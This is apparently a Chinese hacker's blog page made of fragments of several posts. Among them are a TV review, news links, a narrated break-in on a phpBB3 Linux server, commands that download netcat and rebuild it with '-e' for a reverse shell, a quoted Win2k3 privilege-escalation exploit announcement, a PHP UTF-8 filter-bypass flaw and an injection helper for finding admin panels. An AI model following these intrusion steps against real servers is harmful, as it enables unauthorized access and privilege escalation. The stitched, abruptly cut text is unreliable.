NetKnave 's BLog

写《武林外传》的那个宁财神出的片子《防火墙5788》还蛮凑合的。
看完了。片子总体上还是很不错的。
有点小搞笑。有点扯。有点小感动。有点小智慧。虽然整个电视剧跟防火墙好像没什么联系啊
里头还真有黑客。KAO。人家可是用0跟1来黑你的哟

什么是httptunnel?

参考http://www-128.ibm.com/developerworks/cn/security/l-httpunnel/index.html

上面这文章的作者也是极度不负责任的

竟然说--"80端口处于侦听状态，需要注意的是，如果系统本身跑的有web服务（80端口本身处于侦听），并不会影响Httptunnel的工作。"

phpbb3 拿到管理员账号进去能干什么呢？又不能上传个SHELL。确实很头疼啊

搜半天都没搜到有牛人拿到过。难道没人研究它？

去年就试过些招。还是没搞定。今天遇到个phpbb3。终于还是拿到shell了。。。

一台linux服务器 目地：弹出来提权之  记录一下下

phpspy2008的 Back Connect无效perl跟c的都一样。弹不出来

扔上dc.pl还是没反映 netstat -an看下连接状态.全是 SYN_SENT 发棵了

那我用NC弹一个该行了吧。wget了个nc

linux默认安装的nc没有-e参数。所以要从新down一个

# wget http://www.xfocus.net/tools/200001/nc110.tgz
# tar xvfz nc110.tgz
# sed -e 1319s/res_init/__res_init/ netcat.c > nc.c
# cp nc.c netcat.c
# gcc -O -s -DGAPING_SECURITY_HOLE -DTELNET -DLINUX -static -o nc netcat.c

本地编绎ok扔上去。

迷茫迷惑迷惘就差迷人了
完全的迷失了方向。工作冒得动力冒得么丝乐趣。
卡耐基说了。要让工作变的快乐。来来来。谁来变一个我看看

From：http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

http://phtv.ifeng.com/phinfo/200809/0928_45_810365.shtml
9月28 日x x x：在凤凰电视上看到曼德尔森喝中国牛奶很感动

http://finance.ifeng.com/news/hqcj/20081008/173686.shtml
10月8日  英商务大臣曼德尔森上任当天 肾结石发作接受手术

www.80sec.org

漏洞说明： php是一款被广泛使用的编程语言，可以被嵌套在html里用做web程序开发。但是在php里使用的某些编码函数在处理畸形的utf8序列时会产生不正确的结果，这样在某些情况下可能会引起应用程序的安全漏洞，绕过某些逻辑过滤等等。

漏洞成因：php在处理utf8编码时，对畸形的序列处理不当，如

简单写了个工具。方便大家使用。主要是在存在注入的时候使用
得到密码却找不到后台。可以帮你找到后台
得到MD5破不出密码。可以帮你找到路径。读取数据库配置文件。或许这个明文密码就是后台密码。也可以用来社工进一步渗透。
或者可以备份shell 到爆出来的路径

php use create_function function to CREATE an anonymous function like below(stolen from php_manual):

————————————————–
Description
string create_function ( string args, string code )

Creates an anonymous function from the parameters passed, and returns a unique name for it. Usually the args will be passed as a single quote delimited string, and this is also recommended for the code. The reason for using single quoted strings, is to protect the variable names from parsing, otherwise, if you use double quotes there will be a need to escape the variable names, e.g. \$avar.